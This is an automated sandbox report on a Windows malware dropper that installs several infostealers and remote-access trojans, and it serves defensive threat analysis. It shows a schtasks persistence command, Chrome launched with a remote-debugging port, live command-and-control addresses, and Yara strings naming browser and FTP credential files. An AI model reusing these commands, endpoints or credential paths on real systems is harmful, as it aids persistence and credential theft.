Edit tour

Windows Analysis Report
random.exe

Overview

General Information

Sample name:	random.exe
Analysis ID:	1615892
MD5:	411303148c2c132ec3b30a97c1936cf9
SHA1:	9693f9e29924d1bbb1bf87f10707c74d1df7e996
SHA256:	dc9c553a3ff7574b1007f70a911f10ca22590a7661dfb84a25c5009d1b564fbb
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

Amadey, LummaC Stealer, Poverty Stealer, Quasar, Stealc, Vidar, XenoRAT

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected LummaC Stealer

Yara detected Poverty Stealer

Yara detected Powershell download and execute

Yara detected Quasar RAT

Yara detected Stealc

Yara detected Vidar stealer

Yara detected XenoRAT

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Drops PE files with benign system names

Found direct / indirect Syscall (likely to bypass EDR)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides threads from debuggers

Injects a PE file into a foreign processes

Installs a global keyboard hook

Joe Sandbox ML detected suspicious sample

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: System File Execution Location Anomaly

Switches to a custom stack to bypass stack traces

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Conhost Spawned By Uncommon Parent Process

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

random.exe (PID: 6864 cmdline: "C:\Users\user\Desktop\random.exe" MD5: 411303148C2C132EC3B30A97C1936CF9)

K1T78D2510W1E77KV3WDUQ9M.exe (PID: 3428 cmdline: "C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe" MD5: BE387FA24001FC6815AAA56FD034E158)

chrome.exe (PID: 6944 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7360 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 --field-trial-handle=2324,i,12189002224667484218,16201993814704209176,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe (PID: 4048 cmdline: "C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe" MD5: 190126600C4F0D6F6F75C7BD47081CE9)

skotes.exe (PID: 5064 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 190126600C4F0D6F6F75C7BD47081CE9)

skotes.exe (PID: 2208 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 190126600C4F0D6F6F75C7BD47081CE9)

skotes.exe (PID: 8000 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 190126600C4F0D6F6F75C7BD47081CE9)

KQlljCB.exe (PID: 3180 cmdline: "C:\Users\user\AppData\Local\Temp\1080446001\KQlljCB.exe" MD5: 7289B991C37D058B2E69B3983F75D122)

conhost.exe (PID: 3104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 4228 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

WerFault.exe (PID: 6824 cmdline: C:\Windows\system32\WerFault.exe -u -p 3180 -s 88 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

GWZ8arC.exe (PID: 7112 cmdline: "C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe" MD5: C99113A2E9399ED8A6C2590B20257587)

conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

GWZ8arC.exe (PID: 7672 cmdline: "C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe" MD5: C99113A2E9399ED8A6C2590B20257587)

GWZ8arC.exe (PID: 7260 cmdline: "C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe" MD5: C99113A2E9399ED8A6C2590B20257587)

GWZ8arC.exe (PID: 3084 cmdline: "C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe" MD5: C99113A2E9399ED8A6C2590B20257587)

WerFault.exe (PID: 7476 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 844 MD5: C31336C1EFC2CCB44B4326EA793040F2)

28qbTrm.exe (PID: 7712 cmdline: "C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe" MD5: 04FD32CAD002B6BE92F0B2E84F99084F)

conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

28qbTrm.exe (PID: 7620 cmdline: "C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe" MD5: 04FD32CAD002B6BE92F0B2E84F99084F)

schtasks.exe (PID: 7752 cmdline: "schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\services.exe" /rl HIGHEST /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

services.exe (PID: 7388 cmdline: "C:\Users\user\AppData\Roaming\SubDir\services.exe" MD5: 04FD32CAD002B6BE92F0B2E84F99084F)

conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

services.exe (PID: 7196 cmdline: "C:\Users\user\AppData\Roaming\SubDir\services.exe" MD5: 04FD32CAD002B6BE92F0B2E84F99084F)

services.exe (PID: 7272 cmdline: "C:\Users\user\AppData\Roaming\SubDir\services.exe" MD5: 04FD32CAD002B6BE92F0B2E84F99084F)

schtasks.exe (PID: 7532 cmdline: "schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\services.exe" /rl HIGHEST /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 7328 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7388 -s 832 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7576 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 820 MD5: C31336C1EFC2CCB44B4326EA793040F2)

w3Xwk4R.exe (PID: 5696 cmdline: "C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe" MD5: 0252E4B7D794B447F2625A8EDD396FA3)

w3Xwk4R.exe (PID: 3248 cmdline: "C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe" -burn.clean.room="C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe" -burn.filehandle.attached=528 -burn.filehandle.self=648 MD5: BF6008785C06CBEA998555A713DC191D)

TiVoServer.exe (PID: 3672 cmdline: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe MD5: 1600D4E66F814372153668378D38AB1E)

0LGvvQO.exe (PID: 1712 cmdline: "C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe" MD5: ADD23973544B5D947AFE8C05565E11F9)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Quasar RAT, QuasarRAT	Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.	APT33 Dropping Elephant Stone Panda The Gorgon Group	http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848 https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf https://asec.ahnlab.com/en/31089/	https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.lexfo.fr/StealC_malware_analysis_part1.html https://blog.lexfo.fr/StealC_malware_analysis_part2.html https://blog.lexfo.fr/StealC_malware_analysis_part3.html https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Name	Description	Attribution	Blogpost URLs	Link
XenoRAT		No Attribution	https://axmahr.github.io/posts/xenorat-detection/ https://blog.talosintelligence.com/moonpeak-malware-infrastructure-north-korea/ https://github.com/moom825/xeno-rat https://hunt.io/blog/good-game-gone-bad-xeno-rat-spread-via-gg-domains-and-github https://hunt.io/blog/xenorat-excel-xll-confuserex-as-access-method	https://malpedia.caad.fkie.fraunhofer.de/details/win.xenorat

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.115/c4becf79229cb002.php", "Botnet": "reno"}

Threatname: LummaC

{"C2 url": ["shiningrstars.help", "mercharena.biz", "generalmills.pro", "stormlegue.com", "blast-hubs.com", "blastikcn.com", "nestlecompany.pro"], "Build id": "MfsvtR--PDFtest"}

Threatname: XenoRAT

{"C2 url": "196.251.87.37", "Mutex Name": "Xeno_rat_nd8912d", "Install Folder": "temp"}

Threatname: Poverty Stealer

{"C2 url": "185.244.212.106:2227"}

Threatname: Quasar

{"Version": "1.4.1", "Host:Port": ["195.177.95.118:4782"], "SubDirectory": "SubDir", "InstallName": "services.exe", "MutexName": "6596bd7c-1ad4-4c84-8564-65c9aa359b6d", "StartupKey": "Windows Startup", "Tag": "F2CviXz", "LogDirectoryName": "Logs", "ServerSignature": "uG6V9ZjF+W2FFEucdBCY+sy05hBVSYqEak644K8tisH2YWFD/mA5VaF0j+dXYzqDcgRVY6t4uWWUfcAkvxQVuCwmjWKAp7N/GtVBTaXfoG/zPyA+wufKDAmlh+W6tP9RgctHR4KIE2BFLmFDhjB6P36Udpcy5eBalpqYnhH4Jd/1KczkKHEJCbXCT0kFMPuuCg1/OGoZ5QlEF9bUEPapHc5dG3OF+NmvArWO8ec2gWNU9KC+kl2sitz7VglDdvudTzgrKhuAlwJkkaYinFW7V9sE/vWA5ieJ1d+QMaWcJa1+MJQFgcf3ypEouKSwa79MUzN0glV9NhMGGncr8e53M7XQq3kIq8cdMyXsmOjhzDE9Ani/bmz5QXgY0q96/uSs+5V/C+Evkeo4DikVFE7DJBImPdHt4aEfw4iCBG40vXA6vT7ztVbNAJ/SQBqXod5qiZ7HtgmZSrPjyh5I310UPSlcEZGfyIJnzcD/B1OjkOWxep+JF/YvlP7bybl+ZUUC+FMROC/nus357n4VcrtlKKOGCqpZtfICSrAez0VmLF73dqbpjzW18w3QR/KMvarqOCXcHnuloUpmFHIep9rHfrD2HUgPKPzoFRmU7Bt7beoqmsvQRbySJKfW0eCK/5kXB4oqJ22B9CL207BW94tqTqAp4ELG1Ivge3d+/LTpsE0=", "ServerCertificate": "MIIE9DCCAtygAwIBAgIQAL3ooBv6IzLNucSEspNLATANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI1MDIxMjAzMTgwOFoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAxwsDx181kTWAJwqiqwMONtr+AeE4nkrXLrOdlxefvQX82ff5msd9/jqFAeYr4Xa8jHGTdZ9awEJ1zEHQF4pT5mCc5DXadJ4sr2HLFjB8Ul5M1DQiT6Oim2mqMaAM3EmzfqAolYFP0H9LKFVIpFql77SG5Rkc8/F2146EHDsvBhMZ/pWzLTpBl1fl2atxLRER3Vor3e+rJbtIQsFXrIfOL2BrWGbNkqnsf4SuBx8ST9x8oR0JLmDhAtVgL0K+kvn/Ym2qvDWRUYYUsttizebnaNwxNk3GBAtUmhrNsD1zXUT2Jc695BqXygzDTfiuX0HX3csvyNHSNHxRzEBWKfbLGvIEoSpl67Xcg602fyOXFoYxS2/35OtH6VmYealj1ru6/y7zQmozoNJJ55EuJYJIs2/B1VfqNnsf4ksHuPLnXkjreO+izDhQb9tJffLU/Sgmj5yNgi72kK/f5wjPW/mGCZLdn6V5L8g3lavQqQQIGbpDPbtuCy6+gCjCgNiRrMeQsTmTeKZysgWPxsZAODN9HgprO14UdCT3dSIOlLZFSFi3pWPV5vRqVF9b7SzmtIYB05RwinFKYl5ssilGloTx8gk2TzvEV8YohTNwQLh9mxDhRT1htiiGbxZtBR4xnGb9VwodBrEVujolt42JbHuKwqA2NvUJwophG6KGXK5CF5UCAwEAAaMyMDAwHQYDVR0OBBYEFDtSth0pOkiq2DiBem40excqsQm2MA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAI+yAEGdKqMTgU+FPLZ87eQgYngEAIlgbyp6bXB+8D6Ulvs+nu51r/duGacc4bgNAACGDjU9pZVm7n60o0fg01bGKjWY0CBFR77pAFlvdvFs3L3UAlryGyFwhULw7fNHczCNw1tD4vfCZf/k/GK0DH4V1lxF2Jggt+/b1wIqP4ND6GfKvKvrqdYW6TGYBDjtidzCOeNnDHbRZFNCx0TgEWivMHfSDUinHL9xO4HjhRup8kmL0LAafIgKeKdH1rcFpsp7fGgSx+4GkgtmPlBf86nWOX2RUpcPRL6pImbELcPYntGW1dYqG3ZrU2FWi/TojAtVBnr7qmOlAzwzMXSvDew0VNJmUMy5llp/2krUGaLqo6EVROXpD1TgRRMCzdBll2LBKAWCiPish8JjkWryxEMSDUnoBCQNrMRJofPL+S+LzecCcvbFLP3ycpqf5AVfcI3fjaYVN517BH75Rs5siCMe3tocoBTGc4yyOfZd4oALuvV43DuJDJSiDSizIxaanA1pr96oOAY6PpXQw51AMDs8vOcAcGZ04SRL09NyHMvFcZgkxXxexvC2hjwj/v9fmUurtdntBZfVOjpzTdEGiNfv6CzzsU2yhaqf0sdemec+wjQ2nQXMP/qTxmYleq6E6pSZoAvw7krvV083fSa/mD9bDXiB295DgjbDcvmeMtKY"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\0LGvvQO[1].exe	JoeSecurity_PovertyStealer	Yara detected Poverty Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe	JoeSecurity_PovertyStealer	Yara detected Poverty Stealer	Joe Security
C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\Rtl60.bpl	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\Users\user\AppData\Roaming\Servicewriter\Rtl60.bpl	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000001C.00000002.2687425992.0000000000720000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000030.00000000.2807373996.0000000000367000.00000002.00000001.01000000.00000026.sdmp	JoeSecurity_PovertyStealer	Yara detected Poverty Stealer	Joe Security
00000017.00000002.2759274946.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000001.00000002.2150281200.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2931305944.0000000000B11000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000013.00000002.2751195208.0000000003999000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000026.00000002.2941190811.00000000036B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000006.00000002.1995703148.0000000000B11000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000D.00000002.2766783072.0000023E5363D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XenoRAT	Yara detected XenoRAT	Joe Security
0000002D.00000002.2887868167.0000000040001000.00000020.00000001.01000000.0000001C.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
0000001C.00000002.2687425992.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000001.00000003.1862642790.0000000005040000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000007.00000002.2007463979.0000000000B11000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000B.00000002.2935102839.00000000013C4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PovertyStealer	Yara detected Poverty Stealer	Joe Security
00000001.00000002.2150281200.000000000115E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000030.00000002.2866371712.0000000000367000.00000002.00000001.01000000.00000026.sdmp	JoeSecurity_PovertyStealer	Yara detected Poverty Stealer	Joe Security
0000000B.00000003.2806966885.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PovertyStealer	Yara detected Poverty Stealer	Joe Security
0000001A.00000002.2767895284.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000001.00000002.2148871243.00000000006B1000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000B.00000003.2806821084.00000000013C4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PovertyStealer	Yara detected Poverty Stealer	Joe Security
00000000.00000003.1689374040.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Process Memory Space: random.exe PID: 6864	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: random.exe PID: 6864	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: random.exe PID: 6864	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: K1T78D2510W1E77KV3WDUQ9M.exe PID: 3428	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: K1T78D2510W1E77KV3WDUQ9M.exe PID: 3428	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: K1T78D2510W1E77KV3WDUQ9M.exe PID: 3428	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: K1T78D2510W1E77KV3WDUQ9M.exe PID: 3428	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: skotes.exe PID: 8000	JoeSecurity_PovertyStealer	Yara detected Poverty Stealer	Joe Security
Process Memory Space: KQlljCB.exe PID: 3180	JoeSecurity_XenoRAT	Yara detected XenoRAT	Joe Security
Process Memory Space: 28qbTrm.exe PID: 7712	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: 28qbTrm.exe PID: 7620	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: services.exe PID: 7272	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: 0LGvvQO.exe PID: 1712	JoeSecurity_PovertyStealer	Yara detected Poverty Stealer	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 33 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
13.2.KQlljCB.exe.23e5364b060.0.unpack	JoeSecurity_XenoRAT	Yara detected XenoRAT	Joe Security
48.0.0LGvvQO.exe.360000.0.unpack	JoeSecurity_PovertyStealer	Yara detected Poverty Stealer	Joe Security
19.2.GWZ8arC.exe.3999550.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
23.2.GWZ8arC.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
11.2.skotes.exe.b10000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
23.2.GWZ8arC.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
48.2.0LGvvQO.exe.360000.0.unpack	JoeSecurity_PovertyStealer	Yara detected Poverty Stealer	Joe Security
13.2.KQlljCB.exe.23e5364b060.0.raw.unpack	JoeSecurity_XenoRAT	Yara detected XenoRAT	Joe Security
45.2.TiVoServer.exe.40000000.13.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
6.2.skotes.exe.b10000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
3.2.VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe.a30000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
7.2.skotes.exe.b10000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
28.2.28qbTrm.exe.400000.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
28.2.28qbTrm.exe.400000.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28eed8:$x1: Quasar.Common.Messages 0x29f201:$x1: Quasar.Common.Messages 0x2ab812:$x4: Uninstalling... good bye :-( 0x2ad007:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
28.2.28qbTrm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2aadc4:$f1: FileZilla\recentservers.xml 0x2aae04:$f2: FileZilla\sitemanager.xml 0x2aae46:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2ab092:$b1: Chrome\User Data\ 0x2ab0e8:$b1: Chrome\User Data\ 0x2ab3c0:$b2: Mozilla\Firefox\Profiles 0x2ab4bc:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fd418:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2ab614:$b4: Opera Software\Opera Stable\Login Data 0x2ab6ce:$b5: YandexBrowser\User Data\ 0x2ab73c:$b5: YandexBrowser\User Data\ 0x2ab410:$s4: logins.json 0x2ab146:$a1: username_value 0x2ab164:$a2: password_value 0x2ab450:$a3: encryptedUsername 0x2fd35c:$a3: encryptedUsername 0x2ab474:$a4: encryptedPassword 0x2fd37a:$a4: encryptedPassword 0x2fd2f8:$a5: httpRealm
28.2.28qbTrm.exe.400000.0.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2ab8fc:$s3: Process already elevated. 0x28ebd7:$s4: get_PotentiallyVulnerablePasswords 0x278c93:$s5: GetKeyloggerLogsDirectory 0x29e960:$s5: GetKeyloggerLogsDirectory 0x28ebfa:$s6: set_PotentiallyVulnerablePasswords 0x2fea46:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
